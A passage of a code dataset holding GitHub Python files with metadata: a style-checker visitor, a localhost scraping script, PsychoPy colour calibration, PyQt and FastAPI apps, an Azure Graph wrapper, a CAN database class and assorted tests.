stripped_token_line[0]\n is_string = token.type == tokenize.STRING\n is_multistring_end = '\"\"\"' in token.line\n return is_comment or is_string or is_multistring_end\n\n\n@final\nclass _FileFunctions(object):\n\n def __init__(self, file_tokens: List[tokenize.TokenInfo]) -> None:\n self._file_tokens = file_tokens\n\n def as_list(self) -> List[_Function]:\n return list(self._search_functions())\n\n def _search_functions(self) -> Iterator[_Function]:\n function_tokens: List[tokenize.TokenInfo] = []\n in_function = False\n function_start_column = 0\n for token in self._file_tokens:\n function_ended = self._is_function_end(\n token,\n bool(function_tokens),\n function_start_column,\n )\n if not in_function and self._is_function_start(token):\n in_function = True\n function_start_column = token.start[1]\n elif function_ended:\n in_function = False\n function_start_column = 0\n yield _Function(function_tokens)\n function_tokens = []\n if in_function:\n function_tokens.append(token)\n\n def _is_function_start(self, token: tokenize.TokenInfo) -> bool:\n return token.type == tokenize.NAME and token.string in {'def', 'async'}\n\n def _is_function_end(\n self,\n token: tokenize.TokenInfo,\n function_tokens_exists: bool,\n function_start_column: int,\n ) -> bool:\n column_valid = token.start[1] in {0, function_start_column}\n is_dedent_token = token.type == tokenize.DEDENT\n return is_dedent_token and function_tokens_exists and column_valid\n\n\n@final\nclass _FileTokens(object):\n\n def __init__(\n self,\n file_functions: _FileFunctions,\n exps_for_one_empty_line: int,\n ) -> None:\n self._file_functions = file_functions\n self._exps_for_one_empty_line = exps_for_one_empty_line\n\n def analyze(self) -> List[best_practices.WrongEmptyLinesCountViolation]:\n violations = []\n for function in self._file_functions.as_list():\n splitted_function_body = function.body().strip().split('\\n')\n empty_lines_count = len([\n line for line in splitted_function_body if line == ''\n ])\n if not empty_lines_count:\n continue\n\n available_empty_lines = self._available_empty_lines(\n len(splitted_function_body), empty_lines_count,\n )\n if empty_lines_count > available_empty_lines:\n violations.append(\n best_practices.WrongEmptyLinesCountViolation(\n function.name_token(),\n text=str(empty_lines_count),\n baseline=available_empty_lines,\n ),\n )\n return violations\n\n def _available_empty_lines(\n self,\n function_len: int,\n empty_lines: int,\n ) -> int:\n option = self._exps_for_one_empty_line\n if option == 0:\n return 0\n lines_with_expressions = function_len - empty_lines\n return math.floor(lines_with_expressions / option)\n\n\n@final\nclass WrongEmptyLinesCountVisitor(base.BaseTokenVisitor):\n \"\"\"Restricts empty lines in function or method body.\"\"\"\n\n def __init__(self, *args, **kwargs) -> None:\n \"\"\"Initializes a counter.\"\"\"\n super().__init__(*args, **kwargs)\n self._file_tokens: List[tokenize.TokenInfo] = []\n\n def visit(self, token: tokenize.TokenInfo) -> None:\n \"\"\"Find empty lines count.\"\"\"\n self._file_tokens.append(token)\n if token.type != tokenize.ENDMARKER:\n return\n violations = _FileTokens(\n _FileFunctions(self._file_tokens),\n self.options.exps_for_one_empty_line,\n ).analyze()\n for violation in violations:\n self.add_violation(violation)\n","repo_name":"wemake-services/wemake-python-styleguide","sub_path":"wemake_python_styleguide/visitors/ast/function_empty_lines.py","file_name":"function_empty_lines.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","stars":2321,"dataset":"github-code","pt":"60"} +{"seq_id":"43547443147","text":"\n# # parser.py\nimport requests\nfrom bs4 import BeautifulSoup as bs\n# 로그인할 유저정보를 넣어주자 (모두 문자열)\nurl = 'http://localhost:3000/'\n\nLOGIN_INFO = {\n 'email': 'user1',\n 'pwd': '1'\n}\n\n# # Session 생성, with 구문 안에서 유지\n# with requests.Session() as s:\n# # HTTP POST request: 로그인을 위해 POST url와 함께 전송될 data를 넣어주자.\n# login_req = s.post('http://localhost:3000/auth/login', data=LOGIN_INFO)\n# # 어떤 결과가 나올까요?\n# print(login_req.status_code)\n\nwith requests.Session() as s:\n \n res = s.post(url+'auth/login_process', data=LOGIN_INFO)\n #print(res.text)\n\n #response = s.get(url)\n html = s.get(url+'topic/owner')\n #print(html.text)\n\n soup = bs(html.text, features ='html.parser')\n #print(soup)\n aforms=soup.find_all('form', attrs={'action' : '/topic/owner_process'})\n #print(aform)\n REQC = []\n for aform in aforms:\n a = aform.find_all('input', attrs={'name':'requestContractAddress'})[0]\n REQC.append(a['value'])\n #print(a['value'])\n print(REQC)\n request_INFO={\n 'requestContractAddress':REQC[0]\n }\n res = s.post(url+'topic/owner_yes')#, data=request_INFO)\n print(res.text)\n ","repo_name":"AdoreJE/Dapp_blackbox","sub_path":"Dashcam/crowling.py","file_name":"crowling.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12894226026","text":"import copy\n\nclass NeuralNetwork:\n def __init__(self,optimizer):\n self.optimizer = optimizer\n self.loss=[]\n self.layers=[]\n self.data_layer=None\n self.loss_layer=None\n self.label_tensor = None\n \n def forward(self):\n input_tensor,label_tensor = self.data_layer.next()\n self.label_tensor = label_tensor\n for layer in self.layers:\n input_tensor = layer.forward(input_tensor)\n \n loss_output = self.loss_layer.forward(input_tensor,label_tensor)\n return loss_output\n \n def backward(self):\n error_tensor = self.loss_layer.backward(self.label_tensor)\n \n for layer in self.layers[::-1]:\n error_tensor = layer.backward(error_tensor)\n \n def append_layer(self,layer):\n if layer.trainable:\n layer.optimizer = copy.deepcopy(self.optimizer)\n self.layers.append(layer)\n \n def train(self,iterations):\n for i in range(iterations):\n loss = self.forward()\n self.backward()\n self.loss.append(loss)\n \n def test(self,input_tensor):\n for layer in self.layers:\n input_tensor = layer.forward(input_tensor)\n output = input_tensor\n return output","repo_name":"anubhavsingh1729/NeuralNetwork","sub_path":"NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39969519809","text":"from __future__ import division, print_function\n\nimport sys\nimport json\nimport numpy as np\n\nfrom psychopy import core, visual, event\nfrom psychopy.data import MultiStairHandler\n\nfrom colormath.color_objects import LCHabColor, sRGBColor\nfrom colormath.color_conversions import convert_color\n\nimport cregg\n\n\nimport warnings\nwarnings.simplefilter(\"ignore\", FutureWarning)\n\n\ndef main(arglist):\n\n p = cregg.Params(\"calibrate\")\n p.set_by_cmdline(arglist)\n\n # Open up the stimulus window\n win = cregg.launch_window(p)\n p.win_refresh_hz = win.refresh_hz\n\n # Determine the fixed and moving color parameters\n fixed_L = p.lightness\n C = p.chroma\n fixed_h, moving_h = p.stick_hues\n\n # Initialize the stimulus object\n patches = ColorPatches(win, p)\n\n # Initialize the staircase\n conditions = [{\"stepType\": \"lin\",\n \"nReversals\": p.reversals,\n \"nUp\": 1, \"nDown\": 1,\n \"stepSizes\": p.step_sizes,\n \"startVal\": val,\n \"label\": label}\n for (val, label) in zip(p.start_vals, [\"low\", \"high\"])]\n stairs = MultiStairHandler(nTrials=p.trials,\n conditions=conditions)\n\n # Showt the instructions\n instruct = cregg.WaitText(win, p.instruct_text,\n advance_keys=p.wait_keys,\n quit_keys=p.quit_keys)\n instruct.draw()\n\n # Initialize the clock\n clock = core.Clock()\n\n # Start the log file\n log_cols = [\"staircase\", \"moving_L\", \"choice\", \"time\"]\n p.log_base = p.log_base.format(subject=p.subject, monitor=p.monitor_name)\n log = cregg.DataLog(p, log_cols)\n\n # Initialize a randomizer\n rs = np.random.RandomState()\n\n for moving_L, conditions in stairs:\n\n # Randomize the sides that each hue is shown on\n if rs.rand() < .5:\n # Show fixed color on the left and moving color on the right\n colors = (fixed_L, C, fixed_h), (moving_L, C, moving_h)\n # A \"right\" response will mean the moving color is brighter\n # This will be treated as \"correct\" and will adjust it down\n trial_resp_keys = p.resp_keys[:]\n else:\n # Show fixed color on the right and moving color on the left\n colors = (moving_L, C, moving_h), (fixed_L, C, fixed_h)\n # A \"left\" response will mean the moving color is brighter\n # This will be treated as \"incorrect\" and will adjust it up\n trial_resp_keys = p.resp_keys[::-1]\n\n # Update the colors of the patches and draw them\n patches.set_colors(*colors)\n patches.draw()\n win.flip()\n\n # Listen for the first valid keypress\n resp, time = event.waitKeys(keyList=p.resp_keys,\n timeStamped=clock)[0]\n resp_code = trial_resp_keys.index(resp)\n\n # Update the staircase object\n stairs.addResponse(resp_code)\n\n # Update the log\n log.add_data(dict(staircase=conditions[\"label\"],\n moving_L=moving_L,\n choice=resp_code,\n time=time))\n\n # Wait for the next trial\n win.flip()\n cregg.wait_check_quit(p.iti)\n\n # Compute the lightness to use for the moving hue\n low_reversals = stairs.staircases[0].reversalIntensities[-p.reversals:]\n high_reversals = stairs.staircases[1].reversalIntensities[-p.reversals:]\n reversals = np.r_[low_reversals, high_reversals]\n L = reversals.mean()\n\n # Save out a final with the final calibrated L\n cal_fname = p.color_file.format(subject=p.subject,\n monitor=p.monitor_name)\n with open(cal_fname, \"w\") as fid:\n json.dump(dict(calibrated_L=L), fid)\n\n # Print a summary\n print(\"Total trials: {:d}\".format(stairs.totalTrials))\n print(\"Final luminance: {:.2f}\".format(L))\n print(\"Std. dev. of reversal points: {:.2f}\".format(reversals.std()))\n\n\nclass ColorPatches(object):\n\n def __init__(self, win, p):\n\n grid = np.linspace(-1, 1, 128)\n x, y = np.meshgrid(grid, grid)\n mask = np.where((x ** 2 + y ** 2 < 1) & (x < 0), 1, -1)\n masks = mask, mask[:, ::-1]\n\n patches = [visual.GratingStim(win,\n tex=None,\n size=p.patch_size,\n mask=mask)\n for mask in masks]\n\n self.patches = patches\n\n def set_colors(self, left_lch, right_lch):\n\n left_rgb = self.lch_to_rgb(*left_lch)\n right_rgb = self.lch_to_rgb(*right_lch)\n\n self.patches[0].color = left_rgb\n self.patches[1].color = right_rgb\n\n def lch_to_rgb(self, L, C, h):\n \"\"\"Convert the color values from Lch to (-1, 1) RGB.\"\"\"\n lch = LCHabColor(L, C, h)\n rgb = convert_color(lch, sRGBColor).get_value_tuple()\n psychopy_rgb = np.array(rgb) * 2 - 1\n return psychopy_rgb\n\n def draw(self):\n\n for patch in self.patches:\n patch.draw()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"mwaskom/sticks_experiment","sub_path":"color_calibration.py","file_name":"color_calibration.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4742398921","text":"from rest_framework import serializers\n\nfrom product.models import Product\n\n\nclass ProductListSerializer(serializers.ModelSerializer):\n seller = serializers.SerializerMethodField()\n review_score = serializers.SerializerMethodField()\n\n class Meta:\n model = Product\n fields = (\n 'id',\n 'name',\n 'price',\n 'category',\n 'thumbnail',\n 'seller',\n 'end_at',\n 'review_score',\n )\n\n def get_seller(self, obj):\n return obj.seller.name\n\n def get_review_score(self, obj):\n return obj.review_score\n","repo_name":"CalmCrews/silver_backend","sub_path":"webapp/product/serializers/productListSerializer.py","file_name":"productListSerializer.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29235295098","text":"from PyQt6.QtWidgets import QMainWindow, QFileDialog, QVBoxLayout, QWidget\nfrom BrowseGroup import BrowseGroup\nfrom ExecuteButton import ExecuteButton\nfrom StatusWindow import StatusWindow\nfrom FileLocations import FileLocations\nfrom Compare import Compare\n\n\nclass MainWindow(QMainWindow):\n \n def __init__(self):\n QMainWindow.__init__(self)\n self.__file_locations = FileLocations()\n self.__set_main_window_parameters()\n self.__excel_file_browser = self.__create_excel_file_browser()\n self.__web_app_file_browser = self.__create_web_app_file_browser()\n self.__output_path_browser = self.__create_output_path_browser()\n self.__execute_button = self.__create_execute_button()\n self.__status_window = self.__create_status_window()\n self.__connect_widgets_to_actions()\n self.__layout = self.__create_layout()\n self.__add_widgets_to_layout()\n self.__central_widget = QWidget()\n self.__central_widget.setLayout(self.__layout)\n self.setCentralWidget(self.__central_widget)\n return\n \n def __set_main_window_parameters(self)-> None:\n self.setWindowTitle(\"PDP Web App Cross Checker: 2023-01-24\")\n self.setMinimumWidth(500)\n return\n \n def __create_excel_file_browser(self)-> BrowseGroup:\n browser = BrowseGroup('Excel File:') \n return browser\n\n def __create_web_app_file_browser(self)-> BrowseGroup:\n browser = BrowseGroup('Web App Result File:')\n return browser\n \n def __create_output_path_browser(self)-> BrowseGroup:\n browser = BrowseGroup('Output Path:')\n return browser\n \n def __create_execute_button(self)-> ExecuteButton:\n button = ExecuteButton('Compare')\n return button\n \n def __create_status_window(self)-> StatusWindow:\n window = StatusWindow()\n return window\n \n def __connect_widgets_to_actions(self)-> None:\n self.__excel_file_browser.browse_button.clicked.connect(self.__browse_for_excel_file)\n self.__web_app_file_browser.browse_button.clicked.connect(self.__browse_for_web_app_file)\n self.__output_path_browser.browse_button.clicked.connect(self.__browse_for_output_path)\n self.__execute_button.button.clicked.connect(self.__compare_sheets)\n return\n \n def __create_layout(self)-> QVBoxLayout:\n layout = QVBoxLayout()\n return layout\n \n def __add_widgets_to_layout(self)-> None:\n self.__layout.addWidget(self.__excel_file_browser)\n self.__layout.addWidget(self.__web_app_file_browser)\n self.__layout.addWidget(self.__output_path_browser)\n self.__layout.addWidget(self.__execute_button)\n self.__layout.addWidget(self.__status_window)\n return\n \n def __browse_for_excel_file(self)-> None:\n caption = 'Select Excel file for cross checking...'\n filter_ = 'Excel Files (*.xlsx)'\n file_name = QFileDialog.getOpenFileName(\n parent = self,\n caption = caption,\n filter = filter_\n )\n self.__file_locations.excel = file_name[0]\n self.__excel_file_browser.path_display.setText(self.__file_locations.excel)\n return \n \n def __browse_for_web_app_file(self)-> None:\n caption = 'Select PDP Web Application output file...'\n filter_ = 'CSV Files (*.csv)'\n file_name = QFileDialog.getOpenFileName(\n parent = self,\n caption = caption,\n filter = filter_\n ) \n self.__file_locations.web_app = file_name[0]\n self.__web_app_file_browser.path_display.setText(self.__file_locations.web_app)\n return\n \n def __browse_for_output_path(self)-> None:\n caption = 'Select output path...'\n file_name = QFileDialog.getExistingDirectory(\n parent = self,\n caption = caption\n ) \n self.__file_locations.output = file_name\n self.__output_path_browser.path_display.setText(self.__file_locations.output)\n return\n \n def __compare_sheets(self)-> None:\n Compare(self.__file_locations)\n return\n ","repo_name":"Electro-Matic-Ventures/PDP_Web_App_Checker","sub_path":"src/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"8851263272","text":"import functools\nimport typing\n\nimport torch\n\nfrom torch_rnn_tools import UnidirectionalRNN\n\nclass StackRNNBase(UnidirectionalRNN):\n\n def __init__(self, input_size, stack_reading_size, controller):\n super().__init__()\n self._input_size = input_size\n self.stack_reading_size = stack_reading_size\n self.controller = controller(input_size + stack_reading_size)\n\n def input_size(self):\n return self._input_size\n\n def output_size(self):\n return self.controller.output_size()\n\n class State(UnidirectionalRNN.State):\n\n def __init__(self, rnn, hidden_state, previous_stack, return_actions,\n previous_actions, return_readings, previous_reading,\n stack_args, stack_kwargs):\n super().__init__()\n self.rnn = rnn\n self.hidden_state = hidden_state\n self.previous_stack = previous_stack\n self.return_actions = return_actions\n self.previous_actions = previous_actions\n self.return_readings = return_readings\n self.previous_reading = previous_reading\n self.stack_args = stack_args\n self.stack_kwargs = stack_kwargs\n\n def next(self, input_tensor):\n if self.previous_stack is None:\n stack = self.rnn.initial_stack(\n self.hidden_state.batch_size(),\n self.rnn.stack_reading_size,\n *self.stack_args,\n **self.stack_kwargs\n )\n actions = None\n else:\n stack, actions = self.compute_stack(\n self.hidden_state_output,\n self.previous_stack\n )\n reading = stack.reading()\n controller_input = torch.cat((input_tensor, reading), dim=1)\n next_hidden_state = self.hidden_state.next(controller_input)\n return self.rnn.State(\n rnn=self.rnn,\n hidden_state=next_hidden_state,\n previous_stack=stack,\n return_actions=self.return_actions,\n previous_actions=actions if self.return_actions else None,\n return_readings=self.return_readings,\n previous_reading=reading if self.return_readings else None,\n stack_args=None,\n stack_kwargs=None\n )\n\n def output(self):\n output = self.hidden_state_output\n extras = []\n if self.return_actions:\n extras.append(self.previous_actions)\n if self.return_readings:\n extras.append(self.previous_reading)\n if extras:\n return (output, *extras)\n else:\n return output\n\n @functools.cached_property\n def hidden_state_output(self):\n return self.hidden_state.output()\n\n def detach(self):\n return self.rnn.State(\n rnn=self.rnn,\n hidden_state=self.hidden_state.detach(),\n previous_stack=self.previous_stack.detach() if self.previous_stack is not None else None,\n return_actions=self.return_actions,\n # Do not detach previous_actions because its type is not always\n # Tensor (e.g. it might be a tuple of tensors). This is okay\n # because it will not be used for future hidden states anyway;\n # it will only be returned in the output of the next state, so\n # it doesn't really matter if it's not detached.\n previous_actions=self.previous_actions,\n return_readings=self.return_readings,\n previous_reading=self.previous_reading,\n stack_args=self.stack_args,\n stack_kwargs=self.stack_kwargs\n )\n\n def batch_size(self):\n return self.hidden_state.batch_size()\n\n def slice_batch(self, s):\n return self.rnn.State(\n rnn=self.rnn,\n hidden_state=self.hidden_state.slice_batch(s),\n previous_stack=self.previous_stack.slice_batch(s) if self.previous_stack is not None else None,\n return_actions=self.return_actions,\n previous_actions=self.previous_actions,\n return_readings=self.return_readings,\n previous_reading=self.previous_reading,\n stack_args=self.stack_args,\n stack_kwargs=self.stack_kwargs\n )\n\n def compute_stack(self, hidden_state, stack):\n raise NotImplementedError\n\n def initial_state(self,\n batch_size: int,\n *args,\n return_actions: bool=False,\n return_readings: bool=False,\n first_layer: typing.Optional[torch.Tensor]=None,\n **kwargs):\n \"\"\"Get the initial state of the stack RNN.\n\n :param return_actions: If true, then the output at each timestep will\n also include the stack actions that were emitted just before the\n current timestep. Note that the actions for timesteps 0 and 1 are\n always ``None``.\n :param return_readings: If true, then the output at each timestep will\n also include the stack reading that was emitted just before the\n current timestep. Note that the stack reading for timestep 0 is\n always ``None``.\n :param first_layer: Will be passed to the controller.\n :param args: Will be passed to :py:meth:`initial_stack`.\n :param kwargs: Will be passed to :py:meth:`initial_stack`.\n \"\"\"\n return self.State(\n rnn=self,\n hidden_state=self.controller.initial_state(\n batch_size,\n first_layer=first_layer\n ),\n # There is no \"previous stack\" for the initial hidden state, so\n # set it None. It will call initial_stack() to supply the stack for\n # the next timestep.\n previous_stack=None,\n return_actions=return_actions,\n previous_actions=None,\n return_readings=return_readings,\n previous_reading=None,\n stack_args=args,\n stack_kwargs=kwargs\n )\n\n def initial_stack(self, batch_size, reading_size, *args, **kwargs):\n raise NotImplementedError\n","repo_name":"bdusell/nondeterministic-stack-rnn","sub_path":"src/stack_rnn_models/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":6413,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"51"} +{"seq_id":"3196149023","text":"# To run tests:\n# cd nat-db\n# activate\n# pytest\n# python -m pytest --durations=9 -vv\n#\n# Approx run time: 124 seconds (4 tests)\n#\n# To extract notebook into pure python:\n# jupyter nbconvert --to python advanced-search.ipynb \n\n# Python library\nimport pathlib\n# External packages\nimport nbformat\nfrom nbconvert.preprocessors import ExecutePreprocessor\nimport pytest\n# Local packages\n\ndef pytest_assertrepr_compare(op, left, right):\n if isinstance(left, Foo) and isinstance(right, Foo) and op == \"==\":\n return [\n \"Comparing Foo instances:\",\n \" vals: {} != {}\".format(left.val, right.val),\n ]\n# Then:\n# #! def test_compare():\n# #! f1 = Foo(1)\n# #! f2 = Foo(2)\n# #! assert f1 == f2 \n\nclass TestNotebooks(object):\n # see: https://nbconvert.readthedocs.io/en/latest/api/index.html\n def check_nb_run_errors(self, nbfile):\n nb_file = pathlib.Path(__file__).parent.parent / nbfile\n print(f'nb_file={nb_file}')\n try:\n with open(nb_file) as f:\n nb = nbformat.read(f, as_version=4)\n ep = ExecutePreprocessor(timeout=600, kernel_name='python3')\n #ep.preprocess(nb, {'metadata': {'path': 'notebooks/'}})\n ep.preprocess(nb, {})\n except Exception as err:\n error = err\n else:\n error = None\n\n assert error == None\n \n def test_utils_nb(self):\n self.check_nb_run_errors('utils.ipynb')\n\n def test_sia_nb(self):\n self.check_nb_run_errors('sia.ipynb')\n\n def test_ads_nb(self):\n self.check_nb_run_errors('advanced-search.ipynb')\n #!with open('executed_notebook.ipynb', mode='w', encoding='utf-8') as f:\n #! nbformat.write(nb, f)\n\n def test_auth_nb(self):\n self.check_nb_run_errors('api-authentication.ipynb')\n\n \n","repo_name":"NOAO/nat-nb","sub_path":"tests/test_notebooks.py","file_name":"test_notebooks.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"73078087518","text":"\"\"\"\n# Подключить сессию\nimport session_pack.fast_session\n\nrouter = APIRouter()\nrouter.include_router(session_pack.fast_session.router,\n tags=[\"session\"],\n prefix=\"/session\")\n\"\"\"\nfrom fastapi import APIRouter, Form, Response, Request\n\nfrom vetcin_pack_fastapi.session_pack.base import SESSION_RAM\n\nrouter = APIRouter(tags=[\"session\"], prefix=\"/session\")\n\n\n@router.get(\"/get\")\nasync def get_value_by_key(response: Response, request: Request, key: str = Form(...), ):\n return {\"value\": SESSION_RAM.get(request, response, key)}\n\n\n@router.get(\"/keys\")\nasync def response_keys(response: Response, request: Request):\n return {\"session\": SESSION_RAM.keys(request, response)}\n\n\n@router.get(\"/items\")\nasync def response_items(response: Response, request: Request):\n return {\"session\": SESSION_RAM.items(request, response)}\n","repo_name":"denisxab/vetcin_pack_fastapi","sub_path":"vetcin_pack_fastapi/session_pack/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10189688993","text":"import os\n\nfrom azure.identity import (\n AuthenticationRecord,\n DeviceCodeCredential,\n TokenCachePersistenceOptions,\n)\nfrom kiota_abstractions.serialization import Parsable\nfrom kiota_authentication_azure.azure_identity_authentication_provider import (\n AzureIdentityAuthenticationProvider,\n)\nfrom kiota_serialization_json.json_serialization_writer import JsonSerializationWriter\nfrom msgraph import GraphRequestAdapter, GraphServiceClient\n\n\nclass GraphCredential(DeviceCodeCredential):\n def __init__(self, api: 'GraphAPI', *args, **kwargs) -> None:\n self._api = api\n super().__init__(*args, **kwargs)\n\n def authenticate(self, **kwargs) -> AuthenticationRecord:\n auth = super().authenticate(**kwargs)\n self._api._store_auth(auth)\n return auth\n\n\nclass GraphAPI:\n def __init__(\n self,\n client_id,\n scopes,\n authentication_record_file: str | None = None,\n allow_unencrypted_storage: bool = False,\n ):\n persist = TokenCachePersistenceOptions(\n allow_unencrypted_storage=allow_unencrypted_storage\n )\n self.authentication_record_file = authentication_record_file\n auth = None\n if authentication_record_file and os.path.exists(authentication_record_file):\n with open(authentication_record_file) as f:\n auth = AuthenticationRecord.deserialize(f.read())\n self.credential = GraphCredential(\n self,\n client_id=client_id,\n cache_persistence_options=persist,\n authentication_record=auth,\n )\n auth_provider = AzureIdentityAuthenticationProvider(\n self.credential, scopes=scopes\n )\n adapter = GraphRequestAdapter(auth_provider)\n self.client = GraphServiceClient(adapter)\n # msgraph.generated.sites.sites_request_builder.SitesRequestBuilder = self.client.sites\n\n def _store_auth(self, auth: AuthenticationRecord):\n if self.authentication_record_file:\n with open('auth.json', 'w') as f:\n f.write(auth.serialize())\n\n def __getattribute__(self, name: str):\n try:\n return super().__getattribute__(name)\n except:\n return getattr(self.client, name)\n\n @staticmethod\n def to_json(item: Parsable):\n writer = JsonSerializationWriter()\n item.serialize(writer)\n return writer.writer\n\n\nCLIENT_ID = 'bcc98b3d-df9e-43ac-929c-08b5b7b07648'\nSCOPES = ['User.Read', 'Sites.ReadWrite.All']\n\ngr = GraphAPI(CLIENT_ID, SCOPES)\ngr.client.sites_by_id('bssgj.sharepoint.com').get_by_path_with_path('/sites/SpringHouse')\n","repo_name":"david-why/pydrive","sub_path":"graph_bak.py","file_name":"graph_bak.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74541108959","text":"import ctypes as ct\r\n\r\nfrom .attribute import Attribute\r\nfrom .enums import AttributeOwner\r\nfrom .exceptions import KvdNoAttribute, KvdWrongOwner\r\nfrom .wrapper import dll\r\n\r\n\r\nclass Node:\r\n \"\"\"Database Node\"\"\"\r\n\r\n def __init__(self, db, handle, name=None, comment=None):\r\n self._handle = handle\r\n self._db = db # used to lookup attribute definitions\r\n if name is not None:\r\n self.name = name\r\n if comment is not None:\r\n self.comment = comment\r\n\r\n def __eq__(self, other):\r\n if self.name != other.name:\r\n return False\r\n if self.comment != other.comment:\r\n return False\r\n return True\r\n\r\n def __ne__(self, other):\r\n return not self == other\r\n\r\n def __repr__(self):\r\n return f\"Node(name='{self.name}, comment={self.comment}')\"\r\n\r\n def attributes(self):\r\n \"\"\"Return a generator over all message attributes.\"\"\"\r\n ah = None\r\n nah = ct.c_void_p()\r\n try:\r\n dll.kvaDbGetFirstNodeAttribute(self._handle, ct.byref(nah))\r\n except KvdNoAttribute:\r\n return\r\n while nah.value is not None:\r\n ah, nah = nah, ct.c_void_p()\r\n yield Attribute(self, ah)\r\n try:\r\n dll.kvaDbGetNextAttribute(ah, ct.byref(nah))\r\n except KvdNoAttribute:\r\n return\r\n\r\n def delete_attribute(self, name):\r\n \"\"\"Delete attribute from node.\"\"\"\r\n ah = ct.c_void_p()\r\n dll.kvaDbGetNodeAttributeByName(self._handle, name.encode('utf-8'), ct.byref(ah))\r\n dll.kvaDbDeleteNodeAttribute(self._handle, ah)\r\n\r\n def get_attribute_value(self, name):\r\n \"\"\"Return attribute value\r\n\r\n If the attribute is not set on the message, we return the attribute\r\n definition default value.\r\n\r\n \"\"\"\r\n ah = ct.c_void_p()\r\n\r\n # Try and find attribute on node\r\n try:\r\n dll.kvaDbGetNodeAttributeByName(self._handle, name.encode('utf-8'), ct.byref(ah))\r\n except KvdNoAttribute:\r\n # Lookup the attribute definition\r\n atr_def = self._db.get_attribute_definition_by_name(name)\r\n\r\n # only attributes with node as owner are valid, name is also\r\n # unique accross all attributes so it is enough to check this one\r\n # for owner\r\n if atr_def.owner != AttributeOwner.NODE:\r\n raise KvdWrongOwner()\r\n value = atr_def.definition.default\r\n else:\r\n attribute = Attribute(self._db, ah)\r\n value = attribute.value\r\n return value\r\n\r\n def set_attribute_value(self, name, value):\r\n \"\"\"Set value of attribute 'name' on node.\r\n\r\n If no attribute called 'name' is set on node, attach a node\r\n attribute from the database attribute definition first.\r\n\r\n \"\"\"\r\n ah = ct.c_void_p()\r\n\r\n # Try and find attribute on node\r\n try:\r\n dll.kvaDbGetNodeAttributeByName(self._handle, name.encode('utf-8'), ct.byref(ah))\r\n except KvdNoAttribute:\r\n # If no attribute was found, lookup the attribute definition and\r\n # add a new attribute to the node\r\n attrib_def = self._db.get_attribute_definition_by_name(name)\r\n dll.kvaDbAddNodeAttribute(self._handle, attrib_def._handle, ct.byref(ah))\r\n # Set the value in the node attribute\r\n attribute = Attribute(self._db, ah)\r\n attribute.value = value\r\n\r\n @property\r\n def comment(self):\r\n \"\"\"`str`: The node's comment\"\"\"\r\n buf = ct.create_string_buffer(255)\r\n dll.kvaDbGetNodeComment(self._handle, buf, ct.sizeof(buf))\r\n return buf.value.decode('utf-8')\r\n\r\n @comment.setter\r\n def comment(self, value):\r\n dll.kvaDbSetNodeComment(self._handle, value.encode('utf-8'))\r\n\r\n @property\r\n def name(self):\r\n \"\"\"`str`: The node's name\"\"\"\r\n buf = ct.create_string_buffer(255)\r\n dll.kvaDbGetNodeName(self._handle, buf, ct.sizeof(buf))\r\n return buf.value.decode('utf-8')\r\n\r\n @name.setter\r\n def name(self, value):\r\n dll.kvaDbSetNodeName(self._handle, value.encode('utf-8'))\r\n","repo_name":"Kvaser/pycanlib","sub_path":"canlib/kvadblib/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"51"} +{"seq_id":"22771929877","text":"tries = int(input())\r\nt = 0\r\nwhile t < tries: \r\n answer = input()\r\n x = answer.split('X')\r\n os = 0\r\n for i in range(len(x)):\r\n os += (len(x[i])*(len(x[i])+1))//2\r\n i+=1\r\n print(os)\r\n t += 1","repo_name":"Conni2/Baekjoon","sub_path":"백준/Bronze/8958. OX퀴즈/OX퀴즈.py","file_name":"OX퀴즈.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17139812400","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom uuid import uuid4\n\nimport pytest\nfrom click.testing import CliRunner\n\nfrom monz.command_line import cli\n\n\n# Module fixtures\n@pytest.fixture(scope='module')\ndef runner():\n \"\"\"Get CliRunner\"\"\"\n return CliRunner()\n\n\n# Tests\ndef test_incorrect_access_token(runner):\n \"\"\"Test invoking the script with incorrect access token\"\"\"\n result = runner.invoke(\n cli, args=['--access-token', str(uuid4()), 'info']\n )\n\n assert isinstance(result.exception, SystemExit)\n assert result.exit_code == 1\n\n\ndef test_info(runner):\n \"\"\"\n Test invoking the script 'info' subcommand, which should also be the\n default subcomand\n \"\"\"\n result = runner.invoke(\n cli, args=['info'],\n )\n\n assert result.exit_code == 0\n assert result.output\n assert result.output.startswith('Balance: ')\n assert result.output.count('\\n') >= 6\n\n # Running the script with no arguments should have the same effect\n result_no_args = runner.invoke(cli)\n\n assert result.exit_code == result_no_args.exit_code\n assert result.output == result_no_args.output\n\n\ndef test_accounts(runner):\n \"\"\"Test invoking the script 'accounts' subcommand\"\"\"\n result = runner.invoke(\n cli, args=['accounts'],\n )\n\n assert result.exit_code == 0\n assert 